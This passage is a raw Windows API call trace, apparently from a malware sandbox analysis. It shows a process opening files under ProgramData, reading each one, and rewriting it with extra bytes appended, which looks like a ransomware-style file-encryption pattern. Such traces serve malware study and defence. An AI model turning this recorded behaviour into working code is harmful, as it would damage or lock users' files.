hFile=0x1f0, lpBuffer=0x288f948, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x2fdf278*=0xf000, lpOverlapped=0x0) returned 1 [0149.590] ReadFile (in: hFile=0x1f0, lpBuffer=0x288f948, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x2fdf278*=0xf000, lpOverlapped=0x0) returned 1 [0151.761] ReadFile (in: hFile=0x1f0, lpBuffer=0x288f948, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x2fdf278*=0xf000, lpOverlapped=0x0) returned 1 [0151.761] ReadFile (in: hFile=0x1f0, lpBuffer=0x288f948, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x2fdf278*=0xf000, lpOverlapped=0x0) returned 1 [0151.762] ReadFile (in: hFile=0x1f0, lpBuffer=0x288f948, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x2fdf278*=0xf000, lpOverlapped=0x0) returned 1 [0151.763] ReadFile (in: hFile=0x1f0, lpBuffer=0x288f948, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x2fdf278*=0xf000, lpOverlapped=0x0) returned 1 [0151.764] VirtualAlloc (lpAddress=0x0, dwSize=0x80000, flAllocationType=0x101000, flProtect=0x4) returned 0x7ef00000 [0151.777] ReadFile (in: hFile=0x1f0, lpBuffer=0x288f948, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x2fdf278*=0xf000, lpOverlapped=0x0) returned 1 [0151.781] ReadFile (in: hFile=0x1f0, lpBuffer=0x288f948, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x2fdf278*=0x8000, lpOverlapped=0x0) returned 1 [0151.782] VirtualQuery (in: lpAddress=0x7ef80000, lpBuffer=0x2fdf23c, dwLength=0x1c | out: lpBuffer=0x2fdf23c*(BaseAddress=0x7ef80000, AllocationBase=0x7ef80000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0151.782] VirtualAlloc (lpAddress=0x0, dwSize=0xa0000, flAllocationType=0x101000, flProtect=0x4) returned 0x7ee60000 [0151.798] VirtualFree (lpAddress=0x7ef00000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0152.756] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-8192, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x10e1000 [0152.757] ReadFile (in: hFile=0x1f0, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x2fdf278*=0x2000, lpOverlapped=0x0) returned 1 [0154.420] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-8192, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x10e1000 [0154.429] VirtualAlloc (lpAddress=0x0, dwSize=0x90000, flAllocationType=0x101000, flProtect=0x4) returned 0x7edd0000 [0154.446] VirtualFree (lpAddress=0x7ee60000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0154.450] WriteFile (in: hFile=0x1f0, lpBuffer=0x28790b8*, nNumberOfBytesToWrite=0x2588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x28790b8*, lpNumberOfBytesWritten=0x2fdf28c*=0x2588, lpOverlapped=0x0) returned 1 [0154.452] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0154.452] WriteFile (in: hFile=0x1f0, lpBuffer=0x28790b8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x28790b8*, lpNumberOfBytesWritten=0x2fdf28c*=0xf000, lpOverlapped=0x0) returned 1 [0154.453] WriteFile (in: hFile=0x1f0, lpBuffer=0x28790b8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x28790b8*, lpNumberOfBytesWritten=0x2fdf28c*=0xf000, lpOverlapped=0x0) returned 1 [0154.922] WriteFile (in: hFile=0x1f0, lpBuffer=0x28790b8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x28790b8*, lpNumberOfBytesWritten=0x2fdf28c*=0xf000, lpOverlapped=0x0) returned 1 [0154.923] WriteFile (in: hFile=0x1f0, lpBuffer=0x28790b8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x28790b8*, lpNumberOfBytesWritten=0x2fdf28c*=0xf000, lpOverlapped=0x0) returned 1 [0154.924] WriteFile (in: hFile=0x1f0, lpBuffer=0x28790b8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x28790b8*, lpNumberOfBytesWritten=0x2fdf28c*=0xf000, lpOverlapped=0x0) returned 1 [0154.924] WriteFile (in: hFile=0x1f0, lpBuffer=0x28790b8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x28790b8*, lpNumberOfBytesWritten=0x2fdf28c*=0xf000, lpOverlapped=0x0) returned 1 [0154.925] WriteFile (in: hFile=0x1f0, lpBuffer=0x28790b8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x28790b8*, lpNumberOfBytesWritten=0x2fdf28c*=0xf000, lpOverlapped=0x0) returned 1 [0155.021] WriteFile (in: hFile=0x1f0, lpBuffer=0x28790b8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x28790b8*, lpNumberOfBytesWritten=0x2fdf28c*=0xf000, lpOverlapped=0x0) returned 1 [0155.021] WriteFile (in: hFile=0x1f0, lpBuffer=0x28790b8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x28790b8*, lpNumberOfBytesWritten=0x2fdf28c*=0x8000, lpOverlapped=0x0) returned 1 [0155.021] VirtualFree (lpAddress=0x7edd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0155.024] CloseHandle (hObject=0x1f0) returned 1 [0155.024] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.infopatheditor.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x210 [0158.854] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0158.854] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x17c [0158.857] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0158.857] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0158.857] ReleaseMutex (hMutex=0x168) returned 1 [0158.862] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.INFOPATHEDITOR.14.1033.hxn", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0158.862] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.INFOPATHEDITOR.14.1033.hxn", cchWideChar=29, lpMultiByteStr=0x1f8fc6c, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MS.INFOPATHEDITOR.14.1033.hxn", lpUsedDefaultChar=0x0) returned 29 [0158.862] ReadFile (in: hFile=0x210, lpBuffer=0x25be3f8, nNumberOfBytesToRead=0x17c, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x25be3f8*, lpNumberOfBytesRead=0x2fdf2bc*=0x17c, lpOverlapped=0x0) returned 1 [0158.878] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0158.878] WriteFile (in: hFile=0x210, lpBuffer=0x28956c8*, nNumberOfBytesToWrite=0x704, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x28956c8*, lpNumberOfBytesWritten=0x2fdf2d0*=0x704, lpOverlapped=0x0) returned 1 [0158.878] CloseHandle (hObject=0x210) returned 1 [0158.878] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.onenote.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0159.443] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0159.457] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x152 [0159.457] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0159.457] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0159.459] ReleaseMutex (hMutex=0x168) returned 1 [0159.459] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.ONENOTE.14.1033.hxn", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0159.459] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.ONENOTE.14.1033.hxn", cchWideChar=22, lpMultiByteStr=0x1f88bcc, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MS.ONENOTE.14.1033.hxn", lpUsedDefaultChar=0x0) returned 22 [0159.459] ReadFile (in: hFile=0x1d8, lpBuffer=0x25e9758, nNumberOfBytesToRead=0x152, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x25e9758*, lpNumberOfBytesRead=0x2fdf2bc*=0x152, lpOverlapped=0x0) returned 1 [0159.480] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0159.480] WriteFile (in: hFile=0x1d8, lpBuffer=0x2839428*, nNumberOfBytesToWrite=0x6da, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x2839428*, lpNumberOfBytesWritten=0x2fdf2d0*=0x6da, lpOverlapped=0x0) returned 1 [0159.481] CloseHandle (hObject=0x1d8) returned 1 [0161.423] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.visio.shapesheet.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0161.424] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0161.424] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x188 [0161.424] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0161.424] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0161.424] ReleaseMutex (hMutex=0x168) returned 1 [0161.424] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.VISIO.SHAPESHEET.14.1033.hxn", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0161.424] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.VISIO.SHAPESHEET.14.1033.hxn", cchWideChar=31, lpMultiByteStr=0x1f8fcfc, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MS.VISIO.SHAPESHEET.14.1033.hxn", lpUsedDefaultChar=0x0) returned 31 [0161.424] ReadFile (in: hFile=0x1fc, lpBuffer=0x25be3f8, nNumberOfBytesToRead=0x188, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x25be3f8*, lpNumberOfBytesRead=0x2fdf2bc*=0x188, lpOverlapped=0x0) returned 1 [0161.426] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0161.426] WriteFile (in: hFile=0x1fc, lpBuffer=0x2840958*, nNumberOfBytesToWrite=0x710, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x2840958*, lpNumberOfBytesWritten=0x2fdf2d0*=0x710, lpOverlapped=0x0) returned 1 [0161.426] CloseHandle (hObject=0x1fc) returned 1 [0161.427] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\Windows6.1-KB2999226-x64.msu" (normalized: "c:\\programdata\\package cache\\42d5bec7ddfbd49e76467529cbc2868987bf8460\\packages\\patch\\x64\\windows6.1-kb2999226-x64.msu"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0161.429] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0161.429] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0xf7139 [0161.429] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0161.429] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0161.429] ReleaseMutex (hMutex=0x168) returned 1 [0161.429] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Windows6.1-KB2999226-x64.msu", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0161.429] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Windows6.1-KB2999226-x64.msu", cchWideChar=28, lpMultiByteStr=0x1f8fcfc, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Windows6.1-KB2999226-x64.msu", lpUsedDefaultChar=0x0) returned 28 [0161.429] ReadFile (in: hFile=0x1fc, lpBuffer=0x27fb5d8, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x27fb5d8*, lpNumberOfBytesRead=0x2fdf278*=0xf000, lpOverlapped=0x0) returned 1 [0161.442] ReadFile (in: hFile=0x1fc, lpBuffer=0x27fb5d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x27fb5d8*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0161.503] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0xf6139 [0161.503] ReadFile (in: hFile=0x1fc, lpBuffer=0x286da88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x286da88*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0161.520] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0xf6139 [0161.520] WriteFile (in: hFile=0x1fc, lpBuffer=0x286fae8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x286fae8*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0161.521] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0161.521] WriteFile (in: hFile=0x1fc, lpBuffer=0x28ee2d8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x28ee2d8*, lpNumberOfBytesWritten=0x2fdf28c*=0xf000, lpOverlapped=0x0) returned 1 [0161.521] WriteFile (in: hFile=0x1fc, lpBuffer=0x28ee2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x28ee2d8*, lpNumberOfBytesWritten=0x2fdf28c*=0x1000, lpOverlapped=0x0) returned 1 [0161.521] CloseHandle (hObject=0x1fc) returned 1 [0161.521] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm" (normalized: "c:\\programdata\\package cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0161.522] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0161.522] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x29a [0161.522] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0161.522] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0161.523] ReleaseMutex (hMutex=0x168) returned 1 [0161.523] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="state.rsm", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0161.523] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="state.rsm", cchWideChar=9, lpMultiByteStr=0x1f735ac, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="state.rsm", lpUsedDefaultChar=0x0) returned 9 [0161.523] ReadFile (in: hFile=0x1fc, lpBuffer=0x2663858, nNumberOfBytesToRead=0x29a, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x2663858*, lpNumberOfBytesRead=0x2fdf2bc*=0x29a, lpOverlapped=0x0) returned 1 [0161.524] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0161.524] WriteFile (in: hFile=0x1fc, lpBuffer=0x28449b8*, nNumberOfBytesToWrite=0x822, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x28449b8*, lpNumberOfBytesWritten=0x2fdf2d0*=0x822, lpOverlapped=0x0) returned 1 [0161.524] CloseHandle (hObject=0x1fc) returned 1 [0161.524] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\packages\\vcruntimeadditional_amd64\\cab1.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0161.525] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0161.525] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x554520 [0161.526] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0161.526] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0161.526] ReleaseMutex (hMutex=0x168) returned 1 [0161.526] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="cab1.cab", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0161.526] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="cab1.cab", cchWideChar=8, lpMultiByteStr=0x1f7352c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cab1.cab", lpUsedDefaultChar=0x0) returned 8 [0161.526] ReadFile (in: hFile=0x1fc, lpBuffer=0x2840938, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2840938*, lpNumberOfBytesRead=0x2fdf278*=0xf000, lpOverlapped=0x0) returned 1 [0161.656] ReadFile (in: hFile=0x1fc, lpBuffer=0x2840938, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2840938*, lpNumberOfBytesRead=0x2fdf278*=0xf000, lpOverlapped=0x0) returned 1 [0161.920] ReadFile (in: hFile=0x1fc, lpBuffer=0x2840938, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2840938*, lpNumberOfBytesRead=0x2fdf278*=0x2000, lpOverlapped=0x0) returned 1 [0161.920] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-8192, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x552520 [0161.920] ReadFile (in: hFile=0x1fc, lpBuffer=0x2663838, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesRead=0x2fdf278*=0x2000, lpOverlapped=0x0) returned 1 [0161.936] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-8192, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x552520 [0161.939] WriteFile (in: hFile=0x1fc, lpBuffer=0x284f968*, nNumberOfBytesToWrite=0x2588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x284f968*, lpNumberOfBytesWritten=0x2fdf28c*=0x2588, lpOverlapped=0x0) returned 1 [0161.940] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0161.940] WriteFile (in: hFile=0x1fc, lpBuffer=0x27e0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x27e0018*, lpNumberOfBytesWritten=0x2fdf28c*=0xf000, lpOverlapped=0x0) returned 1 [0161.941] WriteFile (in: hFile=0x1fc, lpBuffer=0x27e0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x27e0018*, lpNumberOfBytesWritten=0x2fdf28c*=0xf000, lpOverlapped=0x0) returned 1 [0161.941] WriteFile (in: hFile=0x1fc, lpBuffer=0x27e0018*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x27e0018*, lpNumberOfBytesWritten=0x2fdf28c*=0x2000, lpOverlapped=0x0) returned 1 [0161.942] CloseHandle (hObject=0x1fc) returned 1 [0161.942] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm" (normalized: "c:\\programdata\\package cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0161.944] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0161.944] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x28e [0161.944] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, 